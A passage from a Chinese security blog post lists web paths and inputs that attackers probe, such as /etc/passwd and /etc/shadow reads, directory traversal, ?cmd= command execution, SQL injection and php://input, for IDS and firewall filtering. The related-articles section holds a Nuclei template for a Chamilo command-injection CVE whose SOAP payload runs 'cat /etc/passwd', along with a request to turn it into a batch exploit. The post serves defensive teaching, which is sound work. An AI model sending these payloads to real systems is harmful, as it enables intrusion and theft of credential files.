常用的过滤网站扫描网站攻击的路径是那些,比如:/etc/passwd等

最新推荐文章于 2024-12-11 14:31:23 发布
最新推荐文章于 2024-12-11 14:31:23 发布
阅读量604 收藏 2
点赞数 7
CC 4.0 BY-SA版权
文章标签: 攻防演练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sunyuhua_keyboard/article/details/137716471
本文详细列举了网站攻击中常见的路径和文件目标,如敏感数据文件、系统管理界面、命令执行漏洞等,强调了网络入侵检测系统和防火墙在防止攻击中的关键作用,以及实施全面防护措施的重要性,包括配置防火墙、使用WAF、更新维护和安全审计。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

网站攻击中经常被尝试的路径主要包括利用漏洞获取敏感文件、执行系统命令或者注入恶意代码的尝试。以下是一些常见的被攻击者尝试访问的路径和文件,这些通常在网络入侵检测系统(IDS)和网络防火墙的过滤规则中被特别关注:

  1. 系统文件和敏感路径

    • /etc/passwd:尝试获取系统用户信息。
    • /etc/shadow:尝试获取含有加密密码的用户信息。
    • /root:尝试访问根用户的主目录。
    • /admin/administrator:尝试访问管理界面。
    • /wp-admin/wp-login.php:针对 WordPress 站点的管理界面和登录页面。
    • /phpinfo.php:尝试获取 PHP 环境的配置信息。
    • /cgi-bin/:尝试访问可能存在的脚本目录。
    • /config:尝试访问配置文件。
    • .git.svn:尝试访问版本控制系统的目录,获取源代码。
    • .env:尝试访问环境配置文件,可能包含敏感信息如数据库密码等。

  2. 命令执行和文件包含漏洞利用

    • ?cmd=ls:尝试远程执行命令。
    • ../../../../etc/passwd:通过目录遍历尝试访问敏感文件。
    • ?file=../../../../etc/passwd:尝试通过文件包含漏洞读取敏感文件。
    • ; DROP TABLE users:SQL 注入尝试。
    • ?page=php://input:尝试利用 PHP 包装协议执行代码。

  3. 资源管理器和数据库访问

    • /phpMyAdmin/pma/dbadmin:尝试访问数据库管理工具。
    • /mysql-admin/sqladmin:尝试访问 SQL 数据库管理界面。
    • /server-status:尝试访问 Apache 的服务器状态页面(通常应当被限制仅允许内部IP访问)。

  4. 通用漏洞利用和攻击向量

    • /shell.php/cmd.php:尝试访问可能被上传的恶意 Web shell。
    • /backup.zip/backup.sql:尝试下载可能存在的备份文件。
    • /xmlrpc.php:针对 WordPress 的 XML-RPC 接口进行攻击尝试。
    • /api/rest/api:尝试利用可能存在的 API 漏洞。

这些只是常见的一些例子,实际上攻击者可能会尝试许多其他不同的路径和文件,取决于特定网站的结构、使用的技术和已知的漏洞。防护措施应包括但不限于配置适当的防火墙规则、使用 Web 应用防火墙(WAF)、定期更新和打补丁程序以及进行安全审计和日志分析。通过这些方法可以有效地减少被攻击的风险和潜在的损害。

扫描整个网站目录IntelliTamper
07-23
扫描整个网站目录IntelliTamper,在找后台时用得上
python之web路径扫描工具
weixin_33862188的博客
01-02 186
# coding: UTF-8 import sys, os, time, httplibimport relist_http=[]  #http数组def open_httptxt():  #打开TXT文本写入数组    try:        passlist = []        list_passlist=[]        xxx = file('http.txt', 'r')   ...
探索SitePathScan:一款强大的网站路径扫描工具
gitblog_00073的博客
04-23 1092
探索SitePathScan:一款强大的网站路径扫描工具 去发现同类优质开源项目:https://gitcode.com/ 在网络安全和Web开发领域中,对于网站路径遍历分析是至关重要的一步,它可以帮助我们发现潜在的安全漏洞、无效链接或优化网页结构。 是一个由SewellDinG开发的开源项目,旨在简化这一过程,提供高效、全面且易于使用的网站路径扫描解决方案。 项目简介 SitePathScan...
python3-网站路径扫描
sinat_40572875的博客
11-15 645
这个脚本是通过异步IO请求,通过创建多个进程来增加扫描速度,通过返回状态码不同来判断是否存在子路径。(如果存在域名泛解析,则需要和目标域名网页的MD5比对,比对相同则表示存在域名泛解析,当然这种判断方式存在误差,后面会同步域名泛解析判断脚本),这里只是熟悉并利用python3异步IO的特性,测试扫描速度。# 2.通过ClientSession对象去发送请求(get, post, delete等)self.urlpath =r'字典文件' #字典文件,可以修改。urlpath:字典文件。
Kali工具之-web网站路径扫描
热门推荐
KingXai的专栏
10-24 2万+
介绍: 通过探测服务器的响应(2xx,3xx,4xx,5xx),来分析web网站的敏感目录; 下载: git clone --depth=1 https://github.com/deibit/cansina; 特点: 多线程SSL支持代理支持数据持久性与sqlite数据库基本认证饼干罐恢复路径递归持久连接互补工具 参数: -u url地址
目录遍历漏洞
L_lemo004的博客
09-22 2095
文章目录目录遍历概念漏洞成因漏洞利用二、目录遍历漏洞第二种情况应用程序操作文件,限制不严时导致访问Web目录以外的文件,包括读写文件和远程执行代码特征测试方法绕过字符过滤利用DVWA进行漏洞测试利用远程文件包含漏洞代码执行权限配置不当引起的本地文件包含漏洞防御措施 目录遍历 概念 目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以是web根目录以外的文件),甚至执行系统命令。
ts=download&file=/etc/passwd这种信息泄露攻击该如何防御呢
03-18
看起来攻击者通过修改参数中的文件路径,试图访问服务器上的敏感文件,比如/etc/passwd。 接下来,我得考虑常见的防御措施。首先,输入验证是关键。用户提供的参数必须进行严格的检查,只允许合法字符,并且限制...
id: CVE-2023-34960 info: name: Chamilo Command Injection author: DhiyaneshDK severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py - http://chamilo.com - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.93314 epss-percentile: 0.99067 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo shodan-query: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve,cve2023,packetstorm,chamilo http: - raw: - | POST /main/webservices/additional_webservices.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope> matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: word part: header words: - text/xml - type: status status: - 200 # digest: 4a0a00473045022034e60ad33e2160ec78cbef2c6c410b14dabd6c3ca8518c21571e310453a24e25022100927e4973b55f38f2cc8ceca640925b7066d4325032b04fb0eca080984080a1d0:922c64590222798bb761d5b6d8e72950根据poc实现python的exp,并且读取当前目录下的文件 批量执行 ,例如,python CVE-2023-34960.py -f .8.txt -c "需要执行的命令" 并将执行成功的结果输出 -o 9.txt 添加选项-o 8.txt的文本文件
最新发布
03-27
例如,示例中的file_name参数使用了反引号、管道符和注释符号来执行cat /etc/passwd。这说明漏洞点在于file_name参数未经过滤,直接将用户输入传递给系统命令执行。 接下来,用户希望编写一个Python脚本,能够批量...
题目内容:c4t同学新做了一个网站,实现了curl的可视化。你能帮他看看有什么问题吗? 容器地址: http://eci-2ze3azcxlyjg9n5kh2ue.cloudeci1.ichunqiu.com:80 输出flag
03-19
首先,我应该考虑常见的Web应用漏洞,比如注入攻击(SQL注入、命令注入)、XSS、CSRF、SSRF、文件包含、不安全的直接对象引用(IDOR)等。由于这是一个curl可视化工具,用户可能输入URL让服务器执行curl请求,那么...
文件包含漏洞尝试思路
elliaaa的博客
10-09 901
1、观察提示,是否为系统文件,如win.ini在windows系统的c:/windows/win.ini中,boot.ini在windows系统的c:/boot.ini中 linux里有:/etc/shadow /etc/passwd 2、带入文件,如果有后缀被自动加上,如果报错,尝试加入%00进行截断,如果报错,尝试加入绝对路径,比如c:/windows/win.ini%00,如果报错,尝试使用…达到256个字符进行截断,尝试加入…/,可以多加几个,因为在有的包含中代码中会加上一个路径前缀,所以我们必须通
WebRobot网站扫描工具
11-22
这是WebRobot网站扫描工具,非常不错的一款web扫描工具
扫描网站目录的工具 很好用的一个工具
06-10
扫描网站目录的工具 很好用的一个工具 收藏了
扫描整个网站目录工具
11-07
可以列出一个网站的目录的工具,挺好用的,有对网站模板可以感兴趣的可以下下来看看!
八大web目录扫描工具(附下载链接)黑客技术必看的超强工具
m0_74824574的博客
12-11 3050
八大web目录扫描工具:御剑、DirBuster、Webdirscan、Cansina、Dirsearch、awvs、wwwscan、dirmap朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~01、御剑介绍御剑是国内第一后台扫描神器,适合小白使用,图形化页面,使用起来简单上手。使用方法域名处,直接输入地址,然后选择密码字典下载地址:https://github.com/foryujian/yjdirscan02、DirBuster简介。
Dirmap:一款高级Web目录文件扫描工具
白帽黑客佳哥的博客
10-15 1801
dictmult该目录为“字典模式”默认多字典文件夹,包含:BAK.min.txt(备份文件小字典),BAK.txt(备份文件大字典),LEAKS.txt(信息泄露文件字典);fuzzmult该目录为“fuzz模式”默认多字典文件夹,包含:fuzz_mode_dir.txt(默认目录字典),fuzz_mode_ext.txt(默认后缀字典)。Q:我倒,配置文件这么多,终于看完了,可是我还想了解下默认的字典,还有怎么添加自己的字典?A:哦呼,这里有默认字典文件介绍。还有添加自定义字典,需要将你的字典放入。
linux中/etc/passwd文件的用法及鼻防御
我只是一个简单的Coder,为了兴趣和理想奋斗在生活的道路上
03-08 983
昨天被虚拟机网络samba问题殴打了一天,最终解决,睡了个好觉,一早醒来,想起看到类似这样一段话: “大多数的服务器都禁止了root账户的直接登陆,而是利用sudo将权限分配给其他管理员,或者先用普通用户登陆,再su成root用户来进行操作,降低了风险。” 于是动手开始进行操作: sudo vi /etc/passwd  直接编辑passwd文件,将root用户的后面加上了
如何获取passwd密码档
03-27 1124
目录: PHF:WWW的PH查询PHF查询攻击新方法 从新手处获取 获取shadow密码档 获取/etc/hosts档 本文列举了几种从UNIX系统获取密码档的方法。其中大多数方法要求你拥有一个有效帐号;但也有不需帐号也可访问系统的方法。在这里你还能知道完整的密码档与shadow密码档的区别,并学习到如何读取shadow密码档。-----------------------------------
使用dirhunt无需暴力破解即可扫描Web目录
猿小白的博客
10-29 322
Dirhunt 是一个针对搜索和分析目录进行优化的网络爬虫。如果服务器启用了“index of”模式,则该工具可以找到有趣的东西。如果未启用目录列表,Dirhunt 也很有用。它可以检测带有虚假 404 错误的目录、创建空索引文件以隐藏内容的目录等等。Dirhunt 不使用暴力。但它也不仅仅是一个。该工具比其他工具更快,因为它最大限度地减少了对服务器的请求。一般来说,该工具需要,具体取决于网站和服务器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MonkeyKing.sun

对你有帮助的话,可以打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值